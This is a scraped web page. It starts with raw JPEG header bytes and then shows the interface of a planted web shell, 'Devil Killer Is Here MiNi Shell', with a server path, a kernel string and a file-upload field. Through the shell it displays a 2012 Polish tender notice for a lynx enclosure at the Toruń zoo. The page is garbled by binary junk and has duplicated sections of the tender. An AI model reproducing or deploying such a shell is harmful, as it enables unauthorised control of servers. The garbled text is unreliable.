JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120301/62634-N-2012.html

<p class="kh_header"><b>Toruń: Wybieg dla rysi wraz z pomieszczeniem dla zwierząt oraz niezbędną infrastrukturą w zakresie  etapu III.</b><br>
<b>Numer ogłoszenia: 62634 - 2012; data zamieszczenia: 01.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ogród Zoobotaniczny , ul. Bydgoska 7, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 0-56 62-242-10, faks 0-56 62-242-10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybieg dla rysi wraz z pomieszczeniem dla zwierząt oraz niezbędną infrastrukturą w zakresie  etapu III..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa: 
wybiegu dla rysi wraz z pomieszczeniem dla zwierząt i niezbędną infrastrukturą.
Przedmiot zamówienia obejmuje:
1)	Budowa wybiegu nr 3;
a)	w zakresie objętym projektem budowlanym, opisami na rysunkach, specyfikacją wykonania i odbioru robót 
b)	zakres nin. przedmiotu zamówienia dopełnia projekt budowlany o nie zrealizowaną w 2011 r. jego część oraz wprowadza rozwiązania zamienne,
c)	zakres nin. przedmiotu zamówienia wskazany został kolorem czerwonym na rysunku projektu zagospodarowania terenu (A1)i na rysunkach architektonicznych projektu budowlanego (A2-A6), podczas gdy zakres wybiegu nr 1 i 2 wykonany w 2011 r. wskazany został kolorem czarnym,
d)	z zastrzeżeniem do p. c) - nie obejmuje warstwy z kory jako nawierzchni wybiegu; zamiennie obejmuje niwelację na płasko nawierzchni wybiegu z wierzchnią warstwą wybiegu z ziemi urodzajnej gr. 10 cm i z zachowaniem poziomu nawierzchni wybiegu jak w projekcie budowlanym,
e)	rozwiązania zamienne;
	dopuszcza się zastosowanie na wybiegu nr 3 wszystkich rozwiązań technologicznych, konstrukcyjnych i materiałowych jak na zrealizowanym w 2011 r. wybiegu nr 1 i 2, z zastrzeżeniem - nie dotyczy panelu wejściowego na wybieg,
f)	dowiezienie do wybiegu nr 3 i montaż do słupów wybiegu nr 3 pni naturalnych drzew; pnie drzew i ich montaż analogicznie jak wykonany w roku 2011 na wybiegu nr 1; pnie drzew pozyskane i dostarczone na teren Ogrodu Zoobotanicznego staraniem i na koszt Zamawiającego. 

2)	Dokończenie zaplecza hodowlanego;
a)	w zakresie objętym projektem budowlanym, opisami na rysunkach, specyfikacją wykonania i odbioru robót 
b)	zakres nin. przedmiotu zamówienia dopełnia projekt budowlany o nie zrealizowaną w 2011 r. jego część oraz wprowadza rozwiązania zamienne
c)	zakres nin. przedmiotu zamówienia wskazany został kolorem czerwonym na rysunku projektu zagospodarowania terenu (A1)i na rysunkach architektonicznych projektu budowlanego (A2-A6), podczas gdy zakres zaplecza hodowlanego wykonanego w 2011 r. wskazany został kolorem czarnym
d)	rozwiązania zamienne w stosunku do projektu budowlanego z 2011 r. -
d1)	ocieplenie ścian klatek hodowlanych nr 3 i 4, wraz z wizjerem wglądu obsługi do klatki hodowlanej    nr 4, jak na rysunkach architektonicznych projektu budowlanego (A2-A6) i w specyfikacji wykonania i odbioru robót,
d2)	ocieplenie dachu klatek hodowlanych nr 3 i 4, jak na rysunkach architektonicznych projektu budowlanego (A2-A6) i w specyfikacji wykonania i odbioru robót,
d3)	doświetlenie w połaci dachowej  klatek hodowlanych nr 3 i 4, jak na rysunkach architektonicznych projektu budowlanego (A2-A6) i w specyfikacji wykonania i odbioru robót,
d4)	ocieplenie drzwi do klatek hodowlanych nr 3 i 4 wraz z wizjerami wglądu obsługi do tych klatek, jak na rysunkach architektonicznych projektu budowlanego (A2-A6) i w specyfikacji wykonania i odbioru robót,
d5)	rozmieszczenie półek-leży dla zwierząt w klatkach hodowlanych nr 3 i 4, jak na rysunkach architektonicznych projektu budowlanego (A2-A6) i w specyfikacji wykonania i odbioru robót,
d6)	rezygnacja z klatki weterynaryjnej/dociskowej nad przestrzenią obsługi; zamiennie leże + klatka dociskowa po jednym komplecie w klatce hodowlanej nr 1 i w klatce hodowlanej nr 4, jak na rysunkach architektonicznych projektu budowlanego (A2-A6) i w specyfikacji wykonania i odbioru robót
d7)	poszerzone drzwi wejściowe do przestrzeni obsługi oraz jednolite przekrycie siatkowe górą przestrzeni obsługi, jak na rysunkach architektonicznych projektu budowlanego (A2-A6) i w specyfikacji wykonania i odbioru robót,
d8)	osłony metalowe na promienniki podsufitowe w klatkach hodowlanych nr 3 i 4, jak na rysunkach architektonicznych projektu budowlanego (A2-A6) i w specyfikacji wykonania i odbioru robót,
e)	dopuszcza się zastosowanie na zapleczu hodowlanym wszystkich rozwiązań technologicznych, konstrukcyjnych i materiałowych jak w zrealizowanej w 2011 r. części zaplecza hodowlanego, z zastrzeżeniem - nie dotyczy odstąpienia od ww. rozwiązań zamiennych.

3)	Branża sanitarna -
a)	w zakresie objętym projektem budowlanym, opisami na rysunkach, specyfikacją wykonania i odbioru robót 
b)	zakres nin. przedmiotu zamówienia dopełnia projekt budowlany o nie zrealizowaną w 2011 r. jego część oraz wprowadza rozwiązania zamienne
c)	zakres nin. przedmiotu zamówienia -
c1)	podejście wodociągiem do klatki hodowlanej nr 3 i 4
c2)	podejście wodociągiem w obszar wybiegu nr 3, montaż w odległości min. 1,5 m poza wybiegiem nr 3 zaworu odcinającego i zaworu spustowego na okres zimowy ze studzienką chłonną w gruncie; prowadzenie przewodów poniżej głębokości przemarzania gruntu; możliwość zabezpieczenia zaworów w okresie ujemnych temperatur
c3)	podejście wodociągiem poza wybiegiem nr 3 w rejon punktu widokowego od strony ul. Bydgoskiej, montaż w odległości min. 1,5 m poza wybiegiem nr 3 zaworu odcinającego i zaworu spustowego na okres zimowy ze studzienką chłonną w gruncie;
zakończenie wodociągu w rejonie punktu widokowego od strony ul. Bydgoskiej - zaworem ze złączką do węża; prowadzenie przewodów poniżej głębokości przemarzania gruntu; możliwość zabezpieczenia zaworów w okresie ujemnych temperatur
d)	rozwiązania zamienne w stosunku do projektu budowlanego z 2011 r.-
patrz p. c3)
e)	dopuszcza się zastosowanie wszystkich rozwiązań technologicznych, konstrukcyjnych i materiałowych jak w zrealizowanej w 2011 r. branży sanitarnej, z zastrzeżeniem - nie dotyczy odstąpienia od ww. zakresu przedmiotu zamówienia

4)	Branża elektryczna;
a)	w zakresie objętym projektem budowlanym, opisami na rysunkach, specyfikacją wykonania i odbioru robót, 
b)	zakres nin. przedmiotu zamówienia dopełnia projekt budowlany o nie zrealizowaną w 2011 r. jego część oraz wprowadza rozwiązania zamienne,
c)	zakres nin. przedmiotu zamówienia:
c1)	podejście zasilaniem elektrycznym dla oświetlenia do klatki hodowlanej nr 3 i 4 i montaż oświetlenia w tych klatkach,
c2)	podejście zasilaniem elektrycznym dla promienników grzewczych do klatki hodowlanej nr 3 i 4 i montaż promienników w tych klatkach,
c3)	schemat elektryczny rozbudowy szafki rozdzielczej w związku p. c2),
d)	rozwiązania zamienne w stosunku do projektu budowlanego z 2011 r. -
d1)	patrz p. c2),
e)	dopuszcza się zastosowanie wszystkich rozwiązań technologicznych, konstrukcyjnych i materiałowych jak w zrealizowanej w 2011 r. branży elektrycznej, z zastrzeżeniem - nie dotyczy odstąpienia od ww. zakresu przedmiotu zamówienia.

5)	Dokończenie zagospodarowania terenu;
a)	w zakresie objętym projektem budowlanym, opisami na rysunkach, specyfikacją wykonania i odbioru robót 
b)	zakres nin. przedmiotu zamówienia dopełnia projekt budowlany o nie zrealizowaną w 2011 r. jego część oraz wprowadza rozwiązania zamienne,
c)	zakres nin. przedmiotu zamówienia wskazany został kolorem czerwonym na rysunku projektu zagospodarowania terenu (A1)i na rysunkach architektonicznych projektu budowlanego (A2-A6), podczas gdy zakres zaplecza hodowlanego wykonanego w 2011 r. wskazany został kolorem czarnym,
d)	zakres nin. przedmiotu zamówienia:
d1)	rozbiórka istn. ogrodzenia między wybiegiem niedźwiedzi a wybiegami rysi na odcinku wskazanym kolorem niebieskim na rysunku projektu zagospodarowania terenu (A1); materiał z rozebranego ogrodzenia przekazany zostanie Zamawiającemu, zastrzeżeniem p.: d2), d6), 
d2)	montaż części ogrodzenia wraz z furtką w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1), pomiędzy wybiegiem niedźwiedzi a wybiegiem rysi nr 1; warunkowo dopuszcza się wykorzystanie ogrodzenia rozebranego  (patrz p. d1),
d3)	rozbiórka istn. przejścia pieszego między wybiegiem niedźwiedzi a wybiegami rysi na odcinku wskazanym obwódką koloru niebieskiego na rysunku projektu zagospodarowania terenu (A1); rozbiórka dotyczy tylko sytuacji, gdy będzie konieczna ze względu na dostęp sprzętu ciężkiego do montażu wybiegu   nr 3,
d4)	odtworzenie rozebranego przejścia pieszego (patrz p. d3); odtworzenie dotyczy tylko sytuacji, gdy dokonana zostanie rozbiórka,
d5)	ciągi piesze publiczności i pozostałe obsługi (wewnątrz zaplecza hodowlanego) w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1); Zamawiający zastrzega, że na dojściu pieszym do punktów widokowych na styku wybiegu nr 2 i 3 może w fazie wykonawczej wprowadzić korekty przebiegu ciągu pieszego dla zachowania istniejącej roślinności, przy zachowaniu przedmiaru robót wg rysunku projektu zagospodarowania terenu (A1),
d6)	siatkowe bariery oddzielenia publiczności od wybiegów w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1), na rysunku architektonicznym projektu budowlanego (A3); warunkowo dopuszcza się wykorzystanie ogrodzenia rozebranego  (patrz p. d1),
d7)	drewniane bariery oddzielenia publiczności od wybiegów w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1), na rysunku architektonicznym projektu budowlanego (A3),
d8)	skarpowanie wraz zielenią stabilizującą skarpy,  w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1).
c2)	podejście zasilaniem elektrycznym dla promienników grzewczych do klatki hodowlanej nr 3 i 4 i montaż promienników w tych klatkach,
c3)	schemat elektryczny rozbudowy szafki rozdzielczej w związku p. c2),
d)	rozwiązania zamienne w stosunku do projektu budowlanego z 2011 r. -
d1)	patrz p. c2),
e)	dopuszcza się zastosowanie wszystkich rozwiązań technologicznych, konstrukcyjnych i materiałowych jak w zrealizowanej w 2011 r. branży elektrycznej, z zastrzeżeniem - nie dotyczy odstąpienia od ww. zakresu przedmiotu zamówienia.

5)	Dokończenie zagospodarowania terenu;
a)	w zakresie objętym projektem budowlanym, opisami na rysunkach, specyfikacją wykonania i odbioru robót 
b)	zakres nin. przedmiotu zamówienia dopełnia projekt budowlany o nie zrealizowaną w 2011 r. jego część oraz wprowadza rozwiązania zamienne,
c)	zakres nin. przedmiotu zamówienia wskazany został kolorem czerwonym na rysunku projektu zagospodarowania terenu (A1)i na rysunkach architektonicznych projektu budowlanego (A2-A6), podczas gdy zakres zaplecza hodowlanego wykonanego w 2011 r. wskazany został kolorem czarnym,
d)	zakres nin. przedmiotu zamówienia:
d1)	rozbiórka istn. ogrodzenia między wybiegiem niedźwiedzi a wybiegami rysi na odcinku wskazanym kolorem niebieskim na rysunku projektu zagospodarowania terenu (A1); materiał z rozebranego ogrodzenia przekazany zostanie Zamawiającemu, zastrzeżeniem p.: d2), d6), 
d2)	montaż części ogrodzenia wraz z furtką w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1), pomiędzy wybiegiem niedźwiedzi a wybiegiem rysi nr 1; warunkowo dopuszcza się wykorzystanie ogrodzenia rozebranego  (patrz p. d1),
d3)	rozbiórka istn. przejścia pieszego między wybiegiem niedźwiedzi a wybiegami rysi na odcinku wskazanym obwódką koloru niebieskiego na rysunku projektu zagospodarowania terenu (A1); rozbiórka dotyczy tylko sytuacji, gdy będzie konieczna ze względu na dostęp sprzętu ciężkiego do montażu wybiegu   nr 3,
d4)	odtworzenie rozebranego przejścia pieszego (patrz p. d3)); odtworzenie dotyczy tylko sytuacji, gdy dokonana zostanie rozbiórka,
d5)	ciągi piesze publiczności i pozostałe obsługi (wewnątrz zaplecza hodowlanego) w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1); Zamawiający zastrzega, że na dojściu pieszym do punktów widokowych na styku wybiegu nr 2 i 3 może w fazie wykonawczej wprowadzić korekty przebiegu ciągu pieszego dla zachowania istniejącej roślinności, przy zachowaniu przedmiaru robót wg rysunku projektu zagospodarowania terenu (A1),
d6)	siatkowe bariery oddzielenia publiczności od wybiegów w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1), na rysunku architektonicznym projektu budowlanego (A3); warunkowo dopuszcza się wykorzystanie ogrodzenia rozebranego  (patrz p. d1),
d7)	drewniane bariery oddzielenia publiczności od wybiegów w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1), na rysunku architektonicznym projektu budowlanego (A3),
d8)	skarpowanie wraz zielenią stabilizującą skarpy,  w miejscu wskazanym na rysunku projektu zagospodarowania terenu (A1).
INFORMACJA

Projekt budowlany (opis, rysunki) załączony do materiałów nin. postępowania przetargowego  dotyczy wszystkich elementów przedsięwzięcia WYBIEG DLA RYSI WRAZ Z POMIESZCZENIEM DLA ZWIERZĄT ORAZ NIEZBĘDNĄ INFRASTRUKTURĄ, 
w tym:

1) zrealizowanych w 2011 r. (w tym: Wybiegi nr 1 i 2, Zaplecze hodowlane klatki hodowlane nr 1 i 2, ciągi piesze związane z wybiegiem nr 1 i dojściem obsługi do zaplecza hodowlanego, przyłącze wodociągowe i elektryczne, instalacja rozprowadzająca sanitarna do klatek hodowlanych nr 1 i 2, wybiegu nr 1 i 2, instalacja elektryczna rozprowadzająca do klatek hodowlanych nr 1 i 2 wraz z szafką sterowniczą)

2) objętych nin. postępowaniem przetargowym (wg p. I. PRZEDMIOT ZAMÓWIENIA)
Ilekroć w p. I. PRZEDMIOT ZAMÓWIENIA występuje wyrażenie w zakresie objętym projektem budowlanym - zakres nie obejmuje ww. p. 1). 

1.2. Wykonawca zrealizuje przedmiot zamówienia w zakresie i w sposób określony w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych (opracowania wykonane przez firmę Alter Polis Gdańska Pracownia Urbanistyczna Sp. z o.o.) oraz zgodnie z  obowiązującymi przepisami, normami  i sztuką budowlaną oraz na podstawie oględzin  obiektu w terenie.
1.3. Wykonawca przed złożeniem oferty  zapozna się  ze  wszystkimi warunkami lokalizacyjnymi,  terenowymi i realizacyjnymi placu budowy i uwzględni je  w wynagrodzeniu ryczałtowym
Przedmiar robót należy traktować jako materiał pomocniczy nie stanowiący podstawy wyceny ,który zostanie zweryfikowany przez Wykonawcę.
1.4. Gwarancja
Termin gwarancji wynosi 4 lata (na urządzenia wbudowane przez Wykonawcę - termin gwarancji wynosi zgodnie z okresem gwarancji producenta, jednak nie krócej niż 2 lata)  i liczy się zarówno dla robót budowlanych jak i dla urządzeń wbudowanych przez Wykonawcę - od dnia dokonania bezusterkowego odbioru końcowego przedmiotu umowy,  z zastrzeżeniem § 11 ust.1.(wzór umowy).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający nie dopuszcza możliwości składania ofert częściowych i wariantowych.
Zamawiający przewiduje udzielenie zamówień uzupełniających (art. 67 ust. 1 pkt. 6 PZP) stanowiących nie więcej niż 50% wartości zamówienia podstawowego i dotyczącego przedmiotu zamówienia-prac określonych w punkcie 1 SIWZ</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 80.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony gdy Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej: 
-	2 obiekty o konstrukcji stalowej lub stalowo-żelbetowej lub stalowo-murowanej (przy czym zastosowanie elementów stalowych w żelbecie lub w murze nie jest uznawane za konstrukcję stalową), o wartości min. 120.000 zł brutto każdy;  
-  oraz 2 obiekty, w których wykonywał indywidualne wyroby ślusarskie wymagające rozwiązań mechanicznych  umożliwiających przesuwanie, podnoszenie, obrót itp. dynamikę w użytkowaniu, o wartości wyrobów ślusarskich min. 10.000 zł brutto w każdym z wznoszonych obiektów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony gdy osoby, którymi dysponuje Wykonawca i które będą uczestniczyć w wykonaniu zamówienia będą posiadać uprawnienia budowlane  do kierowania lub wykonywania robót budowlanych bez ograniczeń lub w zakresie ograniczonym w specjalności odpowiedniej do przedmiotu zamówienia, wydanymi na podstawie Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r.w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578 ze zm) lub innymi uprawnieniami odpowiednimi do przedmiotu zamówienia w świetle obowiązujących przepisów.                
Osoby te muszą przynależeć do odpowiedniej izby samorządu zawodowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) oświadczenie, iż Wykonawca spełnia warunki określone w art. 22 ust. 1 prawa zamówień publicznych


b) oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w
okolicznościach, o których mowa w art. 24 ust. 1 ustawy 
c)oświadczenie Wykonawcy, które z informacji zawartych w ofercie na stronach od -do stanowią
tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy zwalczaniu nieuczciwej konkurencji i jako
takie nie mogą być udostępniane innym uczestnikom postępowania.
Brak powyższego oświadczenia oznaczał będzie, że dokumenty składające się na ofertę nie stanowią tajemnicy
przedsiębiorstwa (Wykonawca nie może zastrzec wszystkich dokumentów).
d) oświadczenie wykonawcy jaką cześć zamówienia zamierza powierzyć podwykonawcom (jeżeli
wykonawca przewiduje wykonanie przedmiotu zamówienia przy udziale podwykonawców).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
